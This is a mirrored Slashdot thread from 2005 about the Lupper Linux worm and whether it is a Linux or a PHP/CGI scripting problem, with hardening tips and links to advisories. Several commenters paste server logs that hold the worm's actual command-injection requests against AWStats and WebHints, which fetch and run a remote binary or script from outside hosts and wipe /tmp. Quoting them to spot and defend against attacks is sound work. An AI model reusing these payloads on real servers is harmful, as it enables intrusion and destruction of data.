Slashdot Mirror
Linux Lupper.Worm In the WIld
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.
p.s. BURN KARMA BURN!
Ubuntu is an African word meaning 'I can't configure Debian'
Second, how do you remove it? Quoth the page:
tasks(723) drafts(105) languages(484) examples(29106)
Seems kind of wrong to name it exclusively a linux problem.
Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!
We must make an effort to get infected?
...then it's a PHP/*nix worm, not Linux specifically.
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
The target has to be standing on one foot, and it needs to be the third wednesday of the month in February.
Really, cmon now.. this gets news? OK, Bravo.. a linux worm.. take away the fact that it's really a web vulnerability that seems to take advantage of a "shell" it could be a solaris/irix/aix/openserver/bsd worm as well..
But for the smear campaign, lets just call it the linux worm to stirr up the zealots.
The road between democracy and tyranny is paved with secrecy in the name of security.
...Linux is more and more popular with corporations holding valuable and important data.
;)
Success is a double-edged sword.
Loading...
So it's just the name of the worm or does anyone seriously think this is a Linux-worm? It's a web-server worm - nothing more than that!
psyeye
All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.
According to http://searchsecurity.techtarget.com/qna/0,289202, sid14_gci955041,00.html, this worm started in 2002... or am I mistaken?
"If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
Paraphrased from the virus description;
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
Paraphrased from the virus description of most MSFT worms:
IF you run an MSFT operating system
AND you havent reformated your HDD in the lsat hour
THEN its time to pucker up and kiss the sucker goodbye..
-GenTimJS
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...
which in practice means that your admin have died a couple of years ago but was never replaced.
May Peace Prevail On Earth
So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?
Using plain ol' text since 1968
I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST
.
.
.
For 60 hits.
Linux has a huge market share in the server market, idiot.
It's the AAPL fanboys you have worry about hereabouts on slashdot: they are all moderators a re-up on quality crack just came through.
I doubt I'll have the libraries required to run this worm.
Whichever av company it was that put out this release, it clearly isn't meant for anyone who's ever used *nix. This message is aimed at potential corporate *nix adopters for whom the lack of viruses might have been a strong selling point. I'm willing to put serious money that there's some lobby cash behind this. This is just like Bush's war - no one with a brain believes its right, but the majority without the brains do, and that's all thats needed. It's disgusting.
An old-timer with old-timey ideas.
http://vil.nai.com/vil/RateThisPage.asp
Let Mcaffe know how well they're trolling.
The road between democracy and tyranny is paved with secrecy in the name of security.
McAfee sucks for real info, look at symantec or at my at summary. In short: Update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated though.
My wife's sketchblog Blob[p]: Gastrono-me
It's a Linux worm? Riiiiiiight.... I wonder who originally raised this with McAfee.
Symantec has a more coverage description page at http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html
including links to XML-RPC PHP1.x library vulnerabilities used by this malware.
This worm is also known as Linux.Plupii and Linux/Lupper.A too.
Internet Storm Center has a lot of technical information at their
http://isc.sans.org/diary.php?storyid=823
Security Focus eWeek CNet
One line blog. I hear that they're called Twitters now.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
In the distros I've used, the user has to explicitely choose to have a web server installed. Even after that, the user's probably going to have to explicitely choose to install PHP.
"...today consumers have been conditioned to think of beer when they see a bullfrog..."
Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.
It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.
Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
Except that in order to be attacked, you must have AWStats or WebHints installed. i.e. This isn't corporate software being attacked. It's technologists and power-users who run their own websites.
Javascript + Nintendo DSi = DSiCade
a decent description can be found here http://isc.sans.org/diary.php?storyid=823
This is all I have to say:
i mpsons/haha.mp3
http://www.gotwavs.com/0078546128/MP3S/TV_Shows/S
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable php or cgi script. I don't think many Linux system ship in this configuration. The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
I already have tcpflow -c port 110 |grep -i pass running in a spare VC. Perhaps now I ought to have tcpflow -c port 80 running in another spare VC at all times, just in case. But I'm going to run out of VCs soon!
According to MacAfee its: It is a modified derivative of the Linux/Slapper ...
And according to a 2002 cert advisory the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..
Surprisingly their seem to be no mention of it a apache.org which leads me to think it's pretty benign and not wide spread. I could be wrong.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again. :-(
Web server running by default? Debian doesn't do that. Apache isn't even installed by default. PHP is a seperate install from Apache. This worm appears to be a problem with PHP, not Linux. Linux is just a kernel. If distros have Apache/PHP up and running by default, that is not good, but its wrong to blame Linux for it when the kernel isn't even remotely involved in the vulnerability.
That's Gnu/Linux worm to you, you insensitive clod!
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
/usr/bin/false. I realize that some people need cli access but it should be severly limited in it's functions and only used by those who have a real need.
1. don't permit external shell access through you www accounts. Make all you www accounts shell be
2. don't permit php/cgi scripts that are explotiable. Okay that is a broad general statement , however there are well known malicious scripts and well known explotiable scripts. Don't allow them. And certainly don't allow them if cli access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL
Politics is Treachery, Religion is Brainwashing
Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.
Linux ships with a webserver running by default? Last I checked there was no webserver in the kernel. Everything else is up to the distributor.
From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.
/tmp.
Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in
Unless I misundersand the article and comments, it seems that
Safety of Linux user who screws up >> MS user who does everything right
Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.
/. bug #926803 - Why I can post.
sounds to me like an apache with php problem.
I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?
sounds to me like a new version of the old formmail.pl problem.
Why read the article when I can just make up a snap judgement?
Set up a cron to run at 1 minute intervals to rm -rf /tmp/lupii
Quite simple really.
Content Management System: A pretentious way of saying "text editor."
True, very true. Unfortunately, AWStats is extremely popular on personal and small business web servers. Its presence is extremely probable as it's a free and feature complete log analyzer. :-(
I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.
What's really interesting, however, is the fact that the worm is very similar to the Slapper worm. The only difference is that it exploits common PHP/CGI software rather than Apache itself. A coincidence, or a new revision of the same virus?
Javascript + Nintendo DSi = DSiCade
Although the kernel webserver was removed in 2.6, there are a lot of people still running 2.4, which includes a webserver in the kernel.
No one enables it though, I'm just being a smartass.
Nihil Illegitemi Carborvndvm
Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.
With that said, my writeup of the worm is here:
http://www.lurhq.com/slapperv2.html
Includes some previously unreleased facts about who wrote most of the code recycled in Slapper and in Lupper.
If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and execute
Its quite obvious that this is a real security malpractice. Even if someone allows external shell commands from web server they usually limit access to this kind of resources.
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
AFAIK, most distros let you choose which services will be installed, so its really up to user.
The Linux webserver would not be vunerable any way, since it does not support PHP.
All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs. Also, most linux machines are converted wintel boxes, meaning that as far as sales stats go, Windows makes out really well. Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running. Now if that linux box originally was a windows box, as it is in most cases, then Microsoft would have 3 "points" and linux none.
Apple often uses sales figures to make their market share appear larger than it is, those numbers are not accurate and highly biased against linux. But as far as your little rant goes, this is an exploit in php and only php. But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine. This worm doesn't use an exploit, it uses people's stupidity that configure machines for convenience rather than security. It's akin to be leavning the door to my house not only unlocked, but wide open because I didn't feel like being inconvenienced by opening it every day. I've never heard of a box being configured the way the aritcle describes so this is indeed a rare occurence.
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes. Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages. If you look at Fedora's page in secunia you'll see that its advisories include updates for Mozilla, Squid, Wget, Abiword and every other package. Considering that one project has the burden of having to report and patch so many packages, you would expect the number to be much higher. Looks like linux is still kicking both Microsoft's and Apple's ass as far as security goes.
Regards,
Steve
Not EXACTLY a *nix worm, but rather a PHP hole, the executable can only be run on a *nix platform however, so the PHP EXPLOIT goes for all platforms with PHP nad unpatched scripts, but the executable the worm uploads and executes is most likley a shell script or *nix executable, SO if the creator wanted he/she COULD have it check what OS the server is running and upload/exec a OS-specific binary.
NO~, I read Slashdot because I think it's stupid.....
If you want to see a total lack of security, don't look at MS. Just post something derogatory of Linux, and watch the geeks line up to find excuses. I've never seen so much insecurity in my life. Posting anonymously because they will now take their insecurity out on me, even though it's not my fault they're incapable of accepting criticism.
because BSD is confirmed dead.'
Rich And Stupid is not so bad as Working For Rich And Stupid.
The reason why this worm exist is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
What about:
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Sure, it lacks the first sentence. But the hive-mind here does not like that argument.
...as a new distro sounds catchy, doesn't it?
one more thing: accorting to the not-very-fine article, the exploit requires one of the following ports listening: UDP 7111, UDP 7222.
So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
I checked my logs and found the following: /stats/awstats/awstats.pl?configdir=|echo%20;cd%20 /tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20membe rs.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm% 20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
[06/Nov/2005:18:13:39 -0500] "GET
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
"according to MS" -> "According to MS when he's interested in not being accused of being a monopoly".
.chm help to another format. Of course, since lawyers know nothing about computers and money in america's justice matters so much it has not been hard for microsoft to convince lawyers that IE can't be separated from windows.
Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the ie com thingy (desktop background, html help, explore.exe's web view, media player) which is good, but that doesn't means it can't be removed (furthermore, IE design is ugly, someone can explain why they don't have a common "image format" com/ole/whatever object that desktop background can use instead of using IE as "kitchen sink")
When microsoft means "tighly integrate", it means "OMG! If we remove IE people won't be able to use a jpg as background and won't be able to read chm help!", but it doesn't means it can't be removed if they wanted, like if they couldn't move the
Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.
/tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Oolite: Elite-like game. For Mac, Linux and Windows
It's not quite lunch, it's not quite supper; let's call it lupper!
Who the hell would do such a thing?
All signs point to linux having anywhere from the same market share as macs up to 3 times the market share of macs, particularly if you take into account webservers which would not show up in places like traditional webstats because web servers don't browse web sites, same thing for HPCs.
:-)
But you'd need to do the same for Macs. Not that I'm saying that Apple is selling more X-Serve Units than Linux installs out there, but the figures for Macs won't show up in the same way that the Linux figures don't show up. It's especially important not to discount Macs as the WebObjects platform is very popular.
Take into account that alot of linux boxes are old as well as new, meaning that alot of people who run linux often run more then one linux box, some of which may be a decade or so old (or much older in some cases). The average wintel box is replaced every 2~3 years. That means, for the sake of argument, if I set up a linux box today and a windows box, in 6 years after the first wintel box is replaced,Microsoft will have 2 "points" and linux will have 1 even though there is still 1 linux box and 1 wintel box running.
I don't really buy this argument. Most Linux users I've seen reinstall their system for every major update, which tends to come more often than Windows. This is something of a requirement as software support isn't as long lasting on Linux as it is on Windows. i.e. Many developers make a concious effort to support machines going all the way back to Win98. Linux developers OTOH tend to target the latest GLIBC, thus requiring that the user churn through new installations at a fairly good clip. BSD machines seem to have a bit longer lifespan, but they also suffer from upgrade-or-die-itis. In the case of FreeBSD, however, the system is designed to be easily upgraded via a system recompile. (Which amazingly tends not to break things.)
But as far as your little rant goes, this is an exploit in php and only php.
Incorrect. It's an exploit against the AWStats CGI script and the PHP XML-RPC APIs. Apparently it can also exploit WebHints. (Whatever that is.)
But it is even more specific than that, you must have a very speicific configuration which pretty much allows anyone to own your machine.
It is a very common configuration. Hundreds of inexpensive web hosts offer AWStats, and many personal web servers run it to track traffic. There are a LOT of people who are vulnerable to this exploit. Especially since people think of AWStats as being something hidden that only they can see. Why would they upgrade?
But just in case you forgot, Mac OSX does have its problems, despite the limited amount of software that comes with them and the limited liability that Apple takes.
What's interesting though is the exploits themselves. Security experts have to really work to find an exploit, and most of the ones they find are impossible to actually exploit under any normal circumstances. e.g. If you check the link you provided, you'll notice how many say "local exploit" on them. As in, you need direct access to the machine before it can be exploited. Under Windows, already having access to the machine is the end of the world unless the user has explicitly locked things down. Under Linux, it depends on the quality of the security configuration. A smart admin would be using SUDO and time-lock screensavers. Not all systems are configured this way, however.
Apple's track record is on par with any linux distro, for instance Debian or Fedora, but this actually means that Apple's record is worse because in a distro like Debian or Fedora, these projects take responsibility for something like 10,000 packages.
That's a non-argument. Macs do everything the users want them to do and yet remain secure. That's the key point. Sometimes less is more.
Thank you for the well reasoned argument.
Javascript + Nintendo DSi = DSiCade
well its a good thing morons don't admin Linux servers.. because if it was anything like Windows, then this worm could have us in for a whole world of hurt..
*plays the Apogee theme song music*
Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers?
... just so you don't need to feel left out.But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-windows users on a weekly basis (Maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
- People switching to a mac won't need their productx
- People running linux won't need their products
- The 800-lb - oops - 1600 lb gorilla in the Window marketspace - Microsoft - is coming out with their own antivirus
If you were in their situation, what would you do?So wait, you are saying that the worm brings Linux and BSD systems into existence? That is amazing, and quite cool if you ask me!
Ohhhh, you meant "affect", not "effect". Someone attempting to be pedantic should choose their words carefully.
My beliefs do not require that you agree with them.
I'm a windows admin and noticed something really funny. When a virus comes out on e of the first pieces of information you get is which platforms are vulnerable and under what conditions. Look at the difference between a Linux worm and a windows one.
Linux:
Linux running webservers, *IF* the target server is running one of the vulnerable scripts, and *IF* it has a specific url, and *IF* it is configured to permit external shell commands, and *IF* it is set to remote file download in the PHP/CGI environment, *THEN MAYBE* a copy of the worm could be downloaded and executed.
Windows:
This virus affects Win 3.1, Win95A, Win95B, Win95C, Win98, Win98SE, Win2000.....
If you are a sysadmin that knows what you are doing, this worm would not effect you.
Let's look at this logically.
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.
Need a Linux consultant in New Orleans?
I just grep'd through my logs and found someone trying (perhaps beta-testing?) this exploit back in June 2005:
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;r m%20-rf%20*;killall%20-9%20perl;wget%20www.suxehac ker.home.ro/sess_3539283e27d73cae29fe2b80f9293f60; perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo% 20;echo| HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/tmp noexec on OS X?
xx.xxx.xx.xx - - [18/Jun/2005:05:51:35 -0400] "GET
Anyone know how to make
Hopefully from now on all worms and viruses will be named according to the OS they affect. I'm tired of hearing Windows worms/viruses referred to as if they were affecting all computers everywhere.
if member of {Windows, Sysadmin} then not exist
This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
the threat level is low to very low depending on reporting site and their need for money.
I prefer the "u" in honour as it seems to be missing these days.
So if you have a Windows, Solaris, OS-X, etc PHP system that has a problematic script, it could probably exploit and get in, but when it tried to run there'd be an error, since the OS wouldn't recognise the executable format. Other OSes that can do Linux binaries like FreeBSD could be potentially infected, but that's probably it. Also probably only works on x86 Linux, not PPC.
I'd try to sell a network/email scanning/monitoring package, myself, for the 'enterprise' environment. Company-wide antivirus for the network.
The World Wide Web is dying. Soon, we shall have only the Internet.
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.That's what you believe. Yet my bank example shows that popularity has nothing to do with security.That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
Looks like this guy has already been infected: tail error_log [client 211.214.161.159] script '/var/www/html/xmlrpc.php' not found or unable to stat [Tue Nov 08 11:42:41 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blog
[Tue Nov 08 11:42:42 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blog
[Tue Nov 08 11:42:44 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blogs
[Tue Nov 08 11:42:45 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/drupal
[Tue Nov 08 11:42:46 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/phpgroupware
[Tue Nov 08 11:42:47 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/wordpress
[client 211.214.161.159] script '/var/www/html/xmlrpc.php' not found or unable to stat
[Tue Nov 08 11:42:50 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/xmlrpc
[Tue Nov 08 11:42:51 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/xmlsrv
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
Sweet! Do you get that girl on the front page after signing up for a year prepaid?
I love all the damage control the fanboi's throw out there.
OH THIS ISN'T A BIG DEAL
OH THIS ISN'T A LINUX PROBLEM SPECIFICALLY
OH IT'S ONLY ON THE 3RD SUNDAY OF THE 5TH MONTH
OH IF THIS WERE WINDOZ (INSERT NOT FUNNY JOKE HERE)
Come on guys, admit you got stung and deal with it. The more popular Linux becomes the more hackers will want to get into it. And since all the source for just about everything is out there, it's alot easier for the smart ones to find, test, & exploit vulnerablities.
Your no more secure then the rest of us, you just weren't on the radar. Now you are. Expect more to come.
Gadget News at Gizmo.com
I'm not seeing anything on my logs.
Why don't you post 10 of those "large number of IP addresses" so substantiate your claim?
Web SERVER. Server! Not browser!
Gotta catch em all.
Why bother Hiding the source IP? cho$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62. 101.193.244| HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 192.108.119.131 - - [08/Nov/2005:11:57:29 -0500] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`e cho$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$I FS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\" `62.101.193.244| HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:30 -0500] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`6 2.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS \"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:31 -0500] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS \"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\" $IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.2 44| HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:32 -0500] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IF S\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\ "$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193. 244| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:33 -0500] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\" $IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$I FS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.1 93.244| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:35 -0500] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\ "$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$ IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101. 193.244| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
